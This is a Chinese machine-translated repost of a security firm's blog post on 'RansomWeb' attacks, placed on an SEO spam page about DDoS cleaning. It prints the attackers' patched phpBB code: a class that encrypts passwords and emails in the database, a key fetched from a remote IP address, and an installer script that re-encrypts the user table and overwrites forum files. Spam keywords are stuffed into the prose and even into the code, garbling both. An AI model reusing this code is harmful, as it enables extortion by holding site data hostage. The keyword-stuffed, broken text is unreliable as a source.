来自 资讯 2021-06-10 22:24 的文章

ddos清洗_移动云发短信未开启抗ddos_无限

ddos清洗_移动云发短信未开启抗ddos_无限

ImmuniWeb>安全博客:新出现的网站威胁,可能超过DDoS、数据窃取和破坏?6.8k 114 35 38 45更多28 39 36星期三,2015年1月28日星期三阅读时间:2分钟。越来越多的人成为勒索软件的受害者,勒索软件是一种加密你的数据并要求金钱来解密的恶意软件。市场上的一个新趋势显示,网络犯罪分子现在也会瞄准你的网站,从中获取赎金你。更多越来越多的人成为勒索软件的受害者,勒索软件是一种加密你的数据并要求金钱来解密的恶意软件。市场上的一个新趋势表明,网络犯罪分子现在也会以你的网站为目标,从你那里获得赎金。2014年12月,我们的安全专家发现了一个非常有趣的金融公司网站泄露案例:该网站停止服务,显示数据库错误,而网站所有者收到一封电子邮件,要求勒索赎金以"解密数据库"。对于这个小公司来说,暂停它的业务并不是一个很重要的问题。我们进行的仔细调查揭示了以下情况:web应用程序在六个月前遭到破坏,修改了几个服务器脚本,以便在将数据插入数据库之前对其进行加密,并在从数据库中获取数据后进行解密。一种web应用程序用户看不见的"动态"补丁。只有数据库表中最关键的字段被加密(可能不会对web应用程序的性能造成太大影响)。所有先前存在的数据库记录都被相应地加密。加密密钥存储在只能通过HTTPS访问的远程web服务器上(可能是为了避免各种流量监视系统截获密钥)。在六个月的时间里,黑客们静静地等待着,而数据库的最新版本正在覆盖备份。在第十天,黑客从远程服务器上取下了密钥。数据库无法使用,网站停止服务,黑客要求勒索加密密钥。我们确信这是一个针对具体公司的复杂的APT的个别例子,然而上周我们又遇到了一个类似的案例。我们的一个客户,一个SMB,在他的…phpBB论坛出故障后被勒索。论坛被用作客户支持的主要平台,因此对客户非常重要。这是2014年11月25日发布的最新phpBB 3.1.2。没有用户可以登录(包括论坛版主和管理员)。论坛是在线的,但是所有要求论坛用户进行身份验证的功能都不起作用。我们的彻底调查显示,论坛引擎的修补方式是,用户的密码和电子邮件在web应用程序和数据库之间"动态"加密。已修改以下文件:1。"文件"工厂.php"的"sql_fetchrow()"函数的修改方式如下:sql查询的结果"$result=$this->get_driver()->sql_fetchrow($query_id);"in array"result"将具有"user_password"和"user_email"表字段的解密值:if(isset($result['user_password']){$result['user_password']=$cipher->decrypt($result['user_password']);}if(isset($result['user_email']){$result['user_email']=$cipher->decrypt($result['user_email']);}2。文件"功能_用户.php"有一个修改版本的"user_add"函数来添加加密:$sql_ary=array('username'=>$user_row['username'],'username_clean'=>$username_clean,'user_password'=>(isset($user_row['user_password'])?$cipher->encrypt($user_row['user_password']):$cipher->encrypt(''),'user_email'=>$cipher->encrypt(strtolower($user_row['user_email']),'user_email_hash($user_row['user_email']),'group_id'=>$user_row['user_type',);3。文件"cp_激活.php"有一个修改版本的函数"main()":$sql_ary=array('user_actkey'=>'','user_password'=>$cipher->encrypt($user_row['user_newpasswd']),'user_newpasswd'=>'','user_login_attempts'=>0,);4。文件"ucp_配置文件.php"具有函数"main()"的修改版本:if(sizeof($sql\u ary)){$sql\u ary['user_email']=$cipher->encrypt($sql\u ary['user_email']);$sql\u ary['user_password']=$cipher->encrypt($sql\u ary['user_password']);$sql='UPDATE'.USERS_TABLE.$db->sql\u build_array('UPDATE',$sql\u ary)。'其中user_id='.$user->data['user_id'];$db->sql_query($sql);5。"文件"配置.php"进行了以下修改:类密码{private$securekey,$iv;函数{$this->securekey=hash('sha256',$textkey,TRUE);$this->iv=mcrypt_create_iv(32);}函数encrypt($input){return base64_encode(mcrypt_encrypt(mcrypt_RIJNDAEL_256,$this->securekey,$input,极路由ddos攻击防御,MCRYPT_MODE_ECB,$this->iv));}函数解密($input){return trim(MCRYPT_RIJNDAEL_256,$this->securekey,base64_decode($input),MCRYPT_MODE_ECB,$this->iv));}}$key=file_get_contents('https://103.13.120.108/sfdoif89d7sf8d979dfgf/sdfds90f8d9s0f8d0f89.txt');$cipher=new cipher($key);此外,我们在服务器上发现了两个黑客留下的后门安装脚本,只需点击几下就可以将任何phpBB论坛后门。第一个安装程序修补程序"配置.php文件添加"Cipher"类,该类使用PHP"mcrypt_encrypt()"函数在远程服务器上存储加密密钥来解密和加密数据:sql_fetchrow($result)){$sql2='UPDATE'.USERS_TABLE.'SET user_password="".$cipher->encrypt($row['user_password']),user_email="'。$cipher->encrypt($row['user_email'])。"其中user_id='。$row['user_id'];$result2=$db->sql\u query($sql2);}echo"sql已更新!
""复制('工厂.php','../phpbb/db/驱动程序/工厂.php');copy('函数_用户.php','../includes/函数_用户.php');复制('ucp_激活.php','../includes/ucp/ucp_激活.php');复制('ucp_配置文件.php','../includes/ucp/ucp_配置文件.php');echo"文件已更新!";攻击者等待了2个月,然后才从远程服务器中删除了密钥。后来我们发现phpBB是通过FTP密码被盗而被泄露的,phpBB软件的安全性与事件没有任何关系。目前没有任何杀毒软件检测到安装者是已知的恶意软件:"step1.php"文件"step2.php"文件是勒索软件攻击的工资,我们称这种黑客技术为勒索网。让我们试着简单分析一下勒索网攻击:勒索网的潜在机会:与DDoS攻击不同的是,它们会对web应用程序可用性产生永久性的影响。可能不仅用于勒索,还可用于长期网站破坏。备份没有太大帮助,因为数据库将以加密模式备份,而加密密钥存储在远程,不会备份。如果不支付赎金,几乎不可能从攻击中恢复过来,许多受害者除了付钱给黑客外别无选择。托管公司还没有准备好迎接这一新的挑战,而且可能无法帮助他们的客户。RansomWeb的潜在弱点:可以很容易地被文件完整性监视器检测到(但是,很少有公司对可能每天都在变化的web应用程序进行文件完整性监控)。在不破坏web应用程序功能和/或速度的情况下加密整个数据库是相当困难的(然而,即使是一个不可恢复的DB字段也可能破坏web应用程序)。在定期更新的web应用程序上使用时,ntpddos防御,可能会很快被检测到。高科技网桥(High Tech Bridge)首席执行官伊利亚•科洛琴科(Ilia Kolochenko)表示:"我们可能正面临一个新的威胁,ddos攻击防御防火墙,这些威胁可能会超过诽谤和DDoS攻击。勒索网攻击可能造成无法弥补的损害,它们很容易造成,也很难防止。黑客们为了荣誉或乐趣攻击网站的日子已经一去不复返了,现在经济利益驱使着他们。网络勒索、敲诈勒索和口号的时代即将开始。"首席研究官马塞尔•尼扎姆蒂诺夫(Marsel Nizamutdinov)补充道:"网络勒索和勒索软件已经存在了一段时间,ddos云防御产生的时间,然而网站是一个新的传播媒介。我们有数以千万计的易受攻击的web应用程序,cdn高防应急中心,黑客绝对不会错过这样一个在疏忽大意的网站管理员身上赚钱的大好机会。"伊利亚·科洛琴科继续说:"防止此类攻击的唯一方法是将常规安全监控与web应用程序渗透测试结合起来。"勒索网攻击的表现会超过b